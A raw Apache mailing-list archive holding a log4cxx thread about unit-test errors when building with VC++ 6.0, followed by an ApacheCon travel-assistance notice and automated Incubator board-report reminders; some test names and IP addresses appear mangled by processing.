font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 12) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger11 (E) = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 13) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate1 (E) = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 14) test: = FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate4 (E) <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 15) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate5 (E) = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; BUILD = FAILED<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; = C:\Projects\logging-log4cxx\build.xml:1133: exec returned: 1<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I appreciate your help and = suggestion.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Thank you.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Michi<o:p></o:p></span></font></p> </div> </body> </html> ------_=_NextPart_001_01C6E332.42417A85-- From [email protected] Thu Sep 28 20:12:04 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71408 invoked from network); 28 Sep 2006 20:12:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Sep 2006 20:12:04 -0000 Received: (qmail 20389 invoked by uid 500); 28 Sep 2006 20:12:03 -0000 Delivered-To: [email protected] Received: (qmail 20361 invoked by uid 500); 28 Sep 2006 20:12:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 20345 invoked by uid 99); 28 Sep 2006 20:12:02 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 28 Sep 2006 13:12:02 -0700 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received: from [161.129.204.104] ([161.129.204.104:42861] helo=smtp111.sbc.mail.re2.yahoo.com) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id FF/AB-17533-D4C2C154 for <[email protected]>; Thu, 28 Sep 2006 13:11:09 -0700 Received: (qmail 44821 invoked from network); 28 Sep 2006 19:42:38 -0000 Received: from unknown (HELO ?161.129.204.104?) ([email protected]@161.129.204.104 with plain) by smtp111.sbc.mail.re2.yahoo.com with SMTP; 28 Sep 2006 19:42:38 -0000 Mime-Version: 1.0 (Apple Message framework v752.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=WINDOWS-1252; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: quoted-printable From: Curt Arnold <[email protected]> Subject: Re: ant build error - at test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord on unit test Date: Thu, 28 Sep 2006 14:42:29 -0500 To: Log4CXX User <[email protected]> X-Mailer: Apple Mail (2.752.2) X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Sep 28, 2006, at 2:10 PM, Kaneko, Michimaro.* (MKANEKO) wrote: > I am trying to do build for VC++ 6.0. > > I am using ant 1.6.5, jdk 1.5. > > > > I checked out the svn trunk yesterday and followed the install file. > > I have cpptasks.jar and ant-contrib.jar in the CLASSPATH. > > I installed GUN patch, GUN sed and added them on the path. > > > > The build did create .lib and .dll, but on the unit test phase, > > I got the following errors: > > > > run-unittest: > > =85 > > > > [exec] 2006-09-28 13:59:38,104 DEBUG =20 > org.apache.log4j.rolling.SizeBasedRollingTest -Hello--24 > > =20 > [exec] .E.E.E.........................................................=20= > ......log4cxx: Cannot get information about host: unknown.host.local > > [exec] ....E.E.E.E.E.E..E.E.E.E......................... > > > > > > [exec] !!!FAILURES!!! > > [exec] Test Results: > > [exec] Run: 261 Failures: 0 Errors: 15 > > > > > > [exec] 1) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 2) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord2 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 3) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestBasic1 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 4) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestBasic2 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 5) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestMultiOption (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 6) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger4 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 7) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger5 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 8) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger6 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 9) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger7 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 10) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger8 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 11) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger9 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 12) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger11 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 13) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate1 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 14) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate4 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 15) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate5 (E) > > [exec] uncaught exception of unknown type > > > > BUILD FAILED > > C:\Projects\logging-log4cxx\build.xml:1133: exec returned: 1 > > > > I appreciate your help and suggestion. > > Thank you. > > > > Michi > > Those errors are known to occur in VC 6, but do not occur in later =20 versions of VC or any other compiler. If I remember correctly, they =20 are related to locale handling in VC 6. The message about =20 "unknown.host.local" is just a diagnostic message and is not related =20 to the test failures. I guess those tests could be suppressed if the =20= _MSC_VER_ is the value for vc 6 or earlier. From [email protected] Thu Sep 28 20:57:01 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86970 invoked from network); 28 Sep 2006 20:57:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Sep 2006 20:57:00 -0000 Received: (qmail 10110 invoked by uid 500); 28 Sep 2006 20:56:59 -0000 Delivered-To: [email protected] Received: (qmail 10088 invoked by uid 500); 28 Sep 2006 20:56:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 10077 invoked by uid 99); 28 Sep 2006 20:56:59 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 28 Sep 2006 13:56:59 -0700 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received: from [161.129.204.104] ([161.129.204.104:1272] helo=EXANPCN4.arinc.com) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id 73/A0-00212-7173C154 for <[email protected]>; Thu, 28 Sep 2006 13:56:56 -0700 Received: from ANPCN1.arinc.com (unverified [161.129.204.104]) by EXANPCN4.arinc.com (Content Technologies SMTPRS 4.3.19) with ESMTP id <[email protected]> for <[email protected]>; Thu, 28 Sep 2006 16:56:49 -0400 Received: from TULMB1.arinc.com ([161.129.204.104]) by ANPCN1.arinc.com with Microsoft SMTPSVC(603)363-6787); Thu, 28 Sep 2006 16:56:31 -0400 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: ant build error - at test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord on unit test Date: Thu, 28 Sep 2006 15:52:32 -0500 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: ant build error - at test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord on unit test Thread-Index: AcbjOlMKILFqfO/OSGKL22NE3wzzRQAA9xfQ From: "Kaneko, Michimaro.* \(MKANEKO\)" <[email protected]> To: "Log4CXX User" <[email protected]> X-OriginalArrivalTime: 28 Sep 2006 20:56:31.0860 (UTC) FILETIME=[937EA340:01C6E340] X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Thank you very much for your reply, Curt. So these errors on unit tests are not really the problems and the build was actually successful? Michi -----Original Message----- From: Curt Arnold [mailto:[email protected]]=20 Sent: Thursday, September 28, 2006 2:42 PM To: Log4CXX User Subject: Re: ant build error - at test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord on unit test On Sep 28, 2006, at 2:10 PM, Kaneko, Michimaro.* (MKANEKO) wrote: > I am trying to do build for VC++ 6.0. > > I am using ant 1.6.5, jdk 1.5. > > > > I checked out the svn trunk yesterday and followed the install file. > > I have cpptasks.jar and ant-contrib.jar in the CLASSPATH. > > I installed GUN patch, GUN sed and added them on the path. > > > > The build did create .lib and .dll, but on the unit test phase, > > I got the following errors: > > > > run-unittest: > > ... > > > > [exec] 2006-09-28 13:59:38,104 DEBUG =20 > org.apache.log4j.rolling.SizeBasedRollingTest -Hello--24 > > =20 > [exec] .E.E.E......................................................... > ......log4cxx: Cannot get information about host: unknown.host.local > > [exec] ....E.E.E.E.E.E..E.E.E.E......................... > > > > > > [exec] !!!FAILURES!!! > > [exec] Test Results: > > [exec] Run: 261 Failures: 0 Errors: 15 > > > > > > [exec] 1) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 2) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord2 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 3) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestBasic1 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 4) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestBasic2 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 5) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestMultiOption (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 6) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger4 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 7) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger5 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 8) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger6 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 9) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger7 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 10) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger8 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 11) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger9 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 12) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger11 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 13) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate1 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 14) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate4 (E) > > [exec] uncaught exception of unknown type > > > > > > [exec] 15) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate5 (E) > > [exec] uncaught exception of unknown type > > > > BUILD FAILED > > C:\Projects\logging-log4cxx\build.xml:1133: exec returned: 1 > > > > I appreciate your help and suggestion. > > Thank you. > > > > Michi > > Those errors are known to occur in VC 6, but do not occur in later =20 versions of VC or any other compiler. If I remember correctly, they =20 are related to locale handling in VC 6. The message about =20 "unknown.host.local" is just a diagnostic message and is not related =20 to the test failures. I guess those tests could be suppressed if the =20 _MSC_VER_ is the value for vc 6 or earlier.
From [email protected] Thu Jul 01 13:10:30 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8721 invoked from network); 1 Jul 2010 13:10:29 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 1 Jul 2010 13:10:29 -0000 Received: (qmail 95437 invoked by uid 500); 1 Jul 2010 13:10:29 -0000 Delivered-To: [email protected] Received: (qmail 95397 invoked by uid 500); 1 Jul 2010 13:10:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95389 invoked by uid 99); 1 Jul 2010 13:10:28 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jul 2010 13:10:28 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jul 2010 13:10:18 +0000 Received: by gwj18 with SMTP id 18so1082877gwj.6 for <[email protected]>; Thu, 01 Jul 2010 06:08:55 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:content-type:mime-version :subject:from:in-reply-to:date:content-transfer-encoding:message-id :references:to:x-mailer; bh=tatGdQCBugD+4gfaLrvwRq6nGUbr+1v4/bLDgBMft4Q=; b=R4bDNonFn0pMXtZGr4j/jxYEhVwiQExVPLdm2sTHO1jL+Yg9KpqOX4ve+f1ZaZMnOg 6Jdc9BKdjMjcbBm+o0r3o3I17MNLtENxEATpqLHJkAUBNKvOxuAk9ovQCvAfOVgVbti4 7G3TsUXgtSfJN7yl+SEzAqJZ8+B1f/WIC6mH0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=content-type:mime-version:subject:from:in-reply-to:date :content-transfer-encoding:message-id:references:to:x-mailer; b=rWpqA7ma5QOzVT0I2IgGC1csVanH9A82QP8zarMhhFrtB1kmPktBZmz0WbQQlIbdyN Ws8HEsEsBdPxiTgsI92LSyJqQHHO43hdFfQoEotuNA1Vtk5B1KU5fj2cYeg0s7KwUG5T vwRkokB03t1KKJN8qI8N/UZGmxv5EGcBIBM34= Received: by 161.129.204.104 with SMTP id u9mr6530240ane.115.1277989734184; Thu, 01 Jul 2010 06:08:54 -0700 (PDT) Received: from [161.129.204.104] ([161.129.204.104]) by mx.google.com with ESMTPS id b6sm70686683ani.1.2161.129.204.104.08.53 (version=TLSv1/SSLv3 cipher=RC4-MD5); Thu, 01 Jul 2010 06:08:53 -0700 (PDT) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1081) Subject: Re: [Travel Assistance] - One week until Applications for financial assistance ends for ApacheCon NA 2010 From: Kevan Miller <[email protected]> In-Reply-To: <[email protected]> Date: Thu, 1 Jul 2010 09:08:53 -0400 Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> References: <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org All, FYI. If you'd like to attend Apache Con, but are having trouble = justifying the expense -- please see below. This is a great program... --kevan On Jul 1, 2010, at 1:14 AM, Gav... wrote: > Hi All, >=20 > There is only ONE WEEK to go before we stop accepting applications for > financial assistance. >=20 > The Travel Assistance Committee is now taking in applications for = those > wanting to attend ApacheCon North America (NA) 2010, which is taking = place > between the 1st and 5th November in Atlanta. >=20 > The Travel Assistance Committee is looking for people who would like = to be > able to attend ApacheCon, but who need some financial support in order = to be > able to get there. There are limited places available, and all = applications > will be scored on their individual merit. >=20 > Financial assistance is available to cover travel, accommodation and > entrance to the event, either in part or in full, depending on > circumstances. However, the support available for those attending only = the > barcamp is smaller than that for people attending the whole event. The > Travel Assistance Committee aims to support all ApacheCons, and > cross-project events, and so it may be prudent for those in Asia and = the EU > to wait for an event closer to them. >=20 > More information can be found on the main Apache website at > http://www.apache.org/travel/index.html - where you will also find a = link to > the online application and details for submitting. >=20 > Applications for applying for travel assistance are now being = accepted, and > will close on the 7th July 2010. >=20 > Good luck to all those that will apply. >=20 > You are welcome to tweet, blog as appropriate. >=20 > Regards, >=20 > The Travel Assistance Committee. From [email protected] Thu Jul 01 14:00:34 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21727 invoked from network); 1 Jul 2010 14:00:33 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 1 Jul 2010 14:00:33 -0000 Received: (qmail 74238 invoked by uid 500); 1 Jul 2010 14:00:33 -0000 Delivered-To: [email protected] Received: (qmail 74063 invoked by uid 500); 1 Jul 2010 14:00:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74005 invoked by uid 99); 1 Jul 2010 14:00:30 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jul 2010 14:00:30 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 01 Jul 2010 14:00:27 +0000 Received: (qmail 21238 invoked by uid 1673); 1 Jul 2010 14:00:05 -0000 Date: 1 Jul 2010 14:00:05 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: Incubator PMC/Board report for July 2010 ([email protected]) X-Virus-Checked: Checked by ClamAV on apache.org Dear BeanValidation Developers, This email was sent by an automated system on behalf of the Apache Incubator PMC. It is an initial reminder to give you plenty of time to prepare your quarterly board report. The board meeting is scheduled for . The report for your podling will form a part of the Incubator PMC report. The Incubator PMC requires your report to be submitted one week before the board meeting, to allow sufficient time for review. Please submit your report with sufficient time to allow the incubator PMC, and subsequently board members to review and digest. Again, the very latest you should submit your report is one week prior to the board meeting. Thanks, The Apache Incubator PMC Submitting your Report ---------------------- Your report should contain the following: * Your project name * A brief description of your project, which assumes no knowledge of the project or necessarily of its field * A list of the three most important issues to address in the move towards graduation. * Any issues that the Incubator PMC or ASF Board might wish/need to be aware of * How has the community developed since the last report * How has the project developed since the last report. This should be appended to the Incubator Wiki page at: http://wiki.apache.org/incubator/July2010 Note: This manually populated. You may need to wait a little before this page is created from a template. Mentors ------- Mentors should review reports for their project(s) and sign them off on the Incubator wiki page. Signing off reports shows that you are following the project - projects that are not signed may raise alarms for the Incubator PMC. Incubator PMC From [email protected] Thu Jul 01 14:00:36 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21825 invoked from network); 1 Jul 2010 14:00:36 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 1 Jul 2010 14:00:36 -0000 Received: (qmail 74505 invoked by uid 500); 1 Jul 2010 14:00:35 -0000 Delivered-To: [email protected] Received: (qmail 74254 invoked by uid 500); 1 Jul 2010 14:00:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74072 invoked by uid 99); 1 Jul 2010 14:00:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jul 2010 14:00:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 01 Jul 2010 14:00:27 +0000 Received: (qmail 21238 invoked by uid 1673); 1 Jul 2010 14:00:05 -0000 Date: 1 Jul 2010 14:00:05 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: Incubator PMC/Board report for July 2010 ([email protected]) X-Virus-Checked: Checked by ClamAV on apache.org Dear BeanValidation Developers, This email was sent by an automated system on behalf of the Apache Incubator PMC. It is an initial reminder to give you plenty of time to prepare your quarterly board report. The board meeting is scheduled for . The report for your podling will form a part of the Incubator PMC report. The Incubator PMC requires your report to be submitted one week before the board meeting, to allow sufficient time for review. Please submit your report with sufficient time to allow the incubator PMC, and subsequently board members to review and digest. Again, the very latest you should submit your report is one week prior to the board meeting. Thanks, The Apache Incubator PMC Submitting your Report ---------------------- Your report should contain the following: * Your project name * A brief description of your project, which assumes no knowledge of the project or necessarily of its field * A list of the three most important issues to address in the move towards graduation. * Any issues that the Incubator PMC or ASF Board might wish/need to be aware of * How has the community developed since the last report * How has the project developed since the last report. This should be appended to the Incubator Wiki page at: http://wiki.apache.org/incubator/July2010 Note: This manually populated. You may need to wait a little before this page is created from a template. Mentors ------- Mentors should review reports for their project(s) and sign them off on the Incubator wiki page. Signing off reports shows that you are following the project - projects that are not signed may raise alarms for the Incubator PMC. Incubator PMC From [email protected] Thu Jul 01 15:40:35 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61320 invoked from network); 1 Jul 2010 15:40:35 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 1 Jul 2010 15:40:35 -0000 Received: (qmail 38795 invoked by uid 500); 1 Jul 2010 15:40:35 -0000 Delivered-To: [email protected] Received: (qmail 38773 invoked by uid 500); 1 Jul 2010 15:40:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38765 invoked by uid 99); 1 Jul 2010 15:40:35 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jul 2010 15:40:35 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ww0-f43.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jul 2010 15:40:28 +0000 Received: by wwb39 with SMTP id 39so918224wwb.0 for <[email protected]>; Thu, 01 Jul 2010 08:40:08 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=XQE0E/kGsYGIZVbK8YoO+uSt0/bMIN0nI6BLYkuHOpk=; b=doKUmjL4ohabT/xf21UxjExTRO7cKPSJQHxKV9n2Ij2+SnYrxv6eBZfQhUvQm6EF4z GGrdNv3ysGXwx1eIlCxu72I0bfqna/ERG2I2fd/vy4CzwDml8NfcMMRZfKbk3CzCADQa RH/eHnhQpZtNlZmNtVNAIFqPt5vlJBd5Jdyjw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=t2BBNSH5vA/E3AIvof5W3nP6ZkbLfqKnB5hpSG6OoPBCqj8lUotip82iLOazdSv1HB sMYIZaRxemaHhWE43GcvR75jCL/9mgWw/IDNyQNL42z8wzk5nrOPKmR76nHWoe0zfw4A 1ZNEdp5ipIY7LiA/MSANpgwz1jHVCv/+RHG/Y= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id j3mr2610891ebd.65.1277998807771; Thu, 01 Jul 2010 08:40:07 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 1 Jul 2010 08:40:07 -0700 (PDT) 